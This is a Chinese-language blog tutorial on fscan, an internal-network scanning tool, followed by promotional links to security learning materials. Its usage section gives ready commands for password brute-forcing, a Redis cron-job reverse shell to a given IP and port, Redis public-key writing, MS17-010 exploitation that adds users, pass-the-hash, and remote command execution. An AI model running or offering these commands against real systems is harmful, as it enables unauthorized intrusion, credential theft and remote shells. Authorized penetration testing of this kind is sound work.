在工地项目管理里面有一句话:安全无小事,责任大于天。这句话其实同样也适用于IT行业中的信息安全。如发生了严重的信息安全事故,不仅对个人、企业会造成严重的影响,乃至对国家社会也会造成很严重的后果。比如,前一段时间如45亿国内快递信息的泄露,非法出售的万份员工简历等等信息安全事件的发生。这些事件不仅侵犯了公民的个人隐私,也暴露了相关企业在数据保护方面存在的漏洞。
所以,安全在任何一个企业都会作为头等大事之一,也是很多企业IT支出的重要一项。而今天给大家介绍的就是一款全方位的内网综合扫描工具-fsacn
01
—
fscan 介绍
一款功能丰富的内网综合扫描工具,一键自动化执行全方位的漏洞扫描任务。支持主机存活探测、端口扫描、服务爆破、系统漏洞扫描、Web指纹识别与漏洞扫描等多种网络安全检测功能**。还支持高危漏洞的利用,比如Redis批量写公钥和SSH命令执行等。**
🏠 项目信息
#github地址``https://github.com/shadow1ng/fscan
🚀功能特性
-
**信息搜集:**能够进行存活探测(使用ICMP协议)和端口扫描,帮助用户快速识别内网中活跃的主机和开放的端口。
-
**爆破功能:**支持对多种服务(如SSH、SMB、RDP等)进行密码爆破,以及对数据库(如MySQL、MSSQL、Redis、PostgreSQL、Oracle等)进行密码爆破。
-
**系统信息与漏洞扫描:**包括NetBIOS探测、域控识别,获取目标网卡信息,以及对高危漏洞(如ms17010)进行扫描。
-
**Web探测功能:**能够进行webtitle探测、Web指纹识别(识别常见的CMS、OA框架等),以及Web漏洞扫描(支持多种Web漏洞的扫描,如Weblogic、Struts2等,并支持xray的poc)。
-
**漏洞利用:**提供对Redis写公钥或写计划任务的能力,SSH命令执行,以及ms17017漏洞利用(如添加用户等)。
-
**灵活的命令行:**用户可以通过命令行参数自定义扫描行为,如指定目标IP范围、跳过某些步骤、使用代理等。
-
**跨平台支持:**fscan支持在多种操作系统上运行,包括Windows、Linux等。
-
**其他功能:**包括文件保存,方便用户将扫描结果保存到指定路径。
02
—
fscan 安装和使用
一、下载****安装
fsacn直接提供了二进制安装包,可以在Github release界面进行下载使用:
linux(amd64)默认使用fscan``windows(x64)默认使用fscan.exe即可
二、简单用法
fscan.exe -h 192.168.1.1/24 (默认使用全部模块)``fscan.exe -h 192.168.1.1/16 (B段扫描)
三、其他用法
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)``fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)``fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)``fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)``fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)``fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)``fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)` `fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )``fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)``fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)``fscan.exe -hf ip.txt (以文件导入)``fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)``fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)``fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)``fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)``fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)``fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)``fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
四、完整参数
`-c string` `ssh命令执行` `-cookie string` `设置cookie` `-debug int` `多久没响应,就打印当前进度(default 60)` `-domain string` `smb爆破模块时,设置域名` `-h string` `目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12` `-hf string` `读取文件中的目标` `-hn string` `扫描时,要跳过的ip: -hn 192.168.1.1/24` `-m string` `设置扫描模式: -m ssh (default "all")` `-no` `扫描结果不保存到文件中` `-nobr` `跳过sql、ftp、ssh等的密码爆破` `-nopoc` `跳过web poc扫描` `-np` `跳过存活探测` `-num int` `web poc 发包速率 (default 20)` `-o string` `扫描结果保存到哪 (default "result.txt")` `-p string` `设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")` `-pa string` `新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)` `-path string` `fcgi、smb romote file path` `-ping` `使用ping代替icmp进行存活探测` `-pn string` `扫描时要跳过的端口,as: -pn 445` `-pocname string` `指定web poc的模糊名字, -pocname weblogic` `-proxy string` `设置代理, -proxy http://127.0.0.1:8080` `-user string` `指定爆破时的用户名` `-userf string` `指定爆破时的用户名文件` `-pwd string` `指定爆破时的密码` `-pwdf string` `指定爆破时的密码文件` `-rf string` `指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)` `-rs string` `redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)` `-silent` `静默扫描,适合cs扫描时不回显` `-sshkey string` `ssh连接时,指定ssh私钥` `-t int` `扫描线程 (default 600)` `-time int` `端口扫描超时时间 (default 3)` `-u string` `指定Url扫描` `-uf string` `指定Url文件扫描` `-wt int` `web访问超时时间 (default 5)` `-pocpath string` `指定poc路径` `-usera string` `在原有用户字典基础上,新增新用户` `-pwda string` `在原有密码字典基础上,增加新密码` `-socks5` `指定socks5代理 (as: -socks5 socks5://127.0.0.1:1080)` `-sc`` 指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)`
03
—
fscan 扫描效果
- 全扫描
./fscan -h xxx.xxx.xxx.xxx (全功能、ms17010、读取网卡信息)。弱密码被扫描出来
- 执行ssh命令
./fscan -h xxx.xxx.xxx.xxx -c “free -g”
- 一键支持xray的poc
./fscan -h 192.168.x.x -p 80 -proxy http://127.0.0.1:8080
- netbios探测、域控识别
./fscan-h xxx.xxx.xxx.xxx -p 139 (下图的[+]DC代表域控)
go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息)
go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)
04
—
综上所述,fsacn使用方法非常灵活,可以通过命令行参数来定制扫描行为,例如指定目标IP范围、跳过某些步骤、使用代理等。但是因为是安全扫描类型工具,我们需要确保遵守相关法律法规,并只在获得授权的环境中使用方可进行,切记滥用。
网络安全学习资源分享:
最后给大家分享我自己学习的一份全套的网络安全学习资料,希望对想学习 网络安全的小伙伴们有帮助!
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套200G学习资源包免费分享!
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取技术文档】
(都打包成一块的了,不能一一展开,总共300多集)
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取书籍】
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享